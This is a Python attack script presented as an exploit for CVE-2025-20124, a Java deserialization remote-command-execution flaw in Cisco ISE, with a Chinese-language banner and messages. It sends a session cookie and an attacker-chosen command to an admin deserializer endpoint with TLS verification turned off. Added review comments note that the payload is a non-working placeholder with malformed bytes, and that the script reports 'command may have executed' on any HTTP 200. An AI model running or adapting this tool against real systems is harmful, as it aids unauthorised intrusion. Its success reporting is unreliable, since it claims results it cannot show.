#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import sys
import argparse
import base64
import urllib3
# Silences urllib3's InsecureRequestWarning for the verify=False request made
# in exploit_deserialization(). This is process-wide: it also hides TLS
# warnings from any other urllib3 user loaded into the same interpreter.
urllib3.disable_warnings()
# Raw string: the backslashes in the ASCII art are literal characters.
# NOTE(review): the art's leading whitespace looks lost in this copy of the
# file; the text is reproduced as found rather than re-aligned.
_BANNER = r"""
_________ .__
\_ ___ \|__| ______ ____ ____
/ \ \/| |/ ___// ___\/ _ \
\ \___| |\___ \\ \__( <_> )
\______ /__/____ >\___ >____/
\/ \/ \/
Cisco ISE Java反序列化RCE
CVE-2025-20124
作者:ibrahmsql | github.com/ibrahmsql
"""


def banner():
    """Print the tool banner (ASCII art, CVE id, author line) to stdout.

    Output begins with a newline (the raw string opens with one) and ends
    with two (the literal's trailing newline plus print's own).
    """
    print(_BANNER)
def build_serialize_payload(cmd):
    """Return a base64 string that stands in for a Java-serialized "exec" payload.

    This is a placeholder, not a working payload: the original author's own
    comment states that real exploitation needs a gadget chain, and none is
    present. What is actually produced is the *text*
    ``<U+00AC><U+00ED><NUL><0x05>sr<NUL>...ExecGadget...execute("<cmd>")``
    with every double quote in ``cmd`` prefixed by a backslash (backslashes
    in ``cmd`` are not escaped), UTF-8 encoded and then base64 encoded.

    NOTE(review): the stream "magic" is written as str code points U+00AC
    U+00ED and then UTF-8 encoded, so the decoded bytes begin with
    C2 AC C3 AD rather than AC ED 00 05. The result is therefore not even a
    structurally valid Java serialization stream, and any HTTP 200 the
    caller gets back says nothing about deserialization or execution.

    Args:
        cmd: Command string spliced into the placeholder.

    Returns:
        str: standard-alphabet, padded base64 of the UTF-8 placeholder bytes.
    """
    quoted = cmd.replace('"', '\\"')
    template = '\xac\xed\x00\x05sr\x00...ExecGadget...execute("%s")'
    placeholder_bytes = (template % quoted).encode("utf-8")
    return base64.b64encode(placeholder_bytes).decode("ascii")
def exploit_deserialization(base_url, session_token, cmd):
    """POST the placeholder payload for CVE-2025-20124 to the target and print the outcome.

    Args:
        base_url: Scheme + host[:port] of the ISE instance, without trailing
            slash (the path "/api/v1/admin/deserializer" is appended verbatim).
        session_token: Value sent as the ISESSIONID cookie; the request is
            authenticated only by this cookie.
        cmd: Command string handed to build_serialize_payload().

    Returns:
        None. Everything goes to stdout; connection/timeout errors are
        printed, not raised, and nothing signals the result to the caller.

    Caveats a reader should know:
        * Success is inferred from HTTP 200 alone. The response body is only
          echoed, never inspected for evidence of execution, so any handler
          that answers 200 to a JSON body is reported as "command may have
          executed". build_serialize_payload() emits a placeholder rather than
          a real gadget chain, so a 200 here is not evidence of anything.
        * verify=False disables TLS certificate verification (the warning is
          silenced at import time); the session cookie is sent over a
          connection anyone on the path can impersonate.
        * The User-Agent "ISE-Exploit" is a trivially signatured string.
        * Response bodies are printed truncated (500 chars on 200, 200 chars
          otherwise); the session token itself is never printed.
    """
    endpoint = f"{base_url}/api/v1/admin/deserializer"
    headers = {
        "Cookie": f"ISESSIONID={session_token}",
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (compatible; ISE-Exploit)",
    }
    body = {"object": build_serialize_payload(cmd)}

    for line in (
        f"[+] 目标: {base_url}",
        f"[+] 端点: {endpoint}",
        f"[+] 命令: {cmd}",
        "[+] 发送反序列化payload...",
    ):
        print(line)

    try:
        resp = requests.post(endpoint, json=body, headers=headers, verify=False, timeout=10)
    except requests.exceptions.RequestException as exc:
        print(f"[-] 请求失败: {exc}")
        return

    # Fixed messages for the status codes the original handled individually.
    known_failures = {
        401: "[-] 认证失败 - 无效的会话token",
        403: "[-] 访问被拒绝 - 权限不足",
        404: "[-] 端点未找到 - 目标可能不受影响",
    }
    if resp.status_code == 200:
        print("[+] Payload发送成功!")
        print("[+] 命令可能已执行!")
        if resp.text:
            print(f"[+] 响应: {resp.text[:500]}")
    elif resp.status_code in known_failures:
        print(known_failures[resp.status_code])
    else:
        print(f"[-] 意外响应: {resp.status_code}")
        print(f"[-] 响应: {resp.text[:200]}")
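def main():
    """Parse command-line arguments and issue the request once.

    Arguments (all required):
        --url      Base URL of the Cisco ISE host; must start with http:// or
                   https://. Trailing slashes are stripped so that the fixed
                   endpoint path is not doubled ("host//api/...").
        --session  ISESSIONID cookie value of an authenticated ISE session.
                   NOTE(review): passing it on argv exposes it in shell history
                   and to any local user via the process list.
        --cmd      Command string embedded in the placeholder payload.

    Exits with status 1 when the URL lacks an http(s) scheme; otherwise the
    exit status is 0 regardless of what the request returned.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2025-20124 - Cisco ISE Java反序列化RCE",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
示例:
python3 CVE-2025-20124.py --url https://ise.company.com --session ABCD1234 --cmd "id"
python3 CVE-2025-20124.py --url https://10.0.0.1:9060 --session TOKEN123 --cmd "whoami"
""",
    )
    parser.add_argument("--url", required=True, help="Cisco ISE设备的基础URL")
    parser.add_argument("--session", required=True, help="认证的ISE会话token")
    parser.add_argument("--cmd", required=True, help="通过反序列化执行的命令")
    args = parser.parse_args()
    banner()
    # Scheme check only; host, port and path are not validated.
    if not args.url.startswith(("http://", "https://")):
        print("[-] URL必须以http://或https://开头")
        sys.exit(1)
    # "https://host/" would otherwise produce "https://host//api/v1/...".
    base_url = args.url.rstrip("/")
    exploit_deserialization(base_url, args.session, args.cmd)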
# Script entry point. main() reports everything on stdout and returns None, so
# the process exits 0 even when the request fails; only a URL without an
# http(s) scheme exits 1.
if __name__ == "__main__":
    main()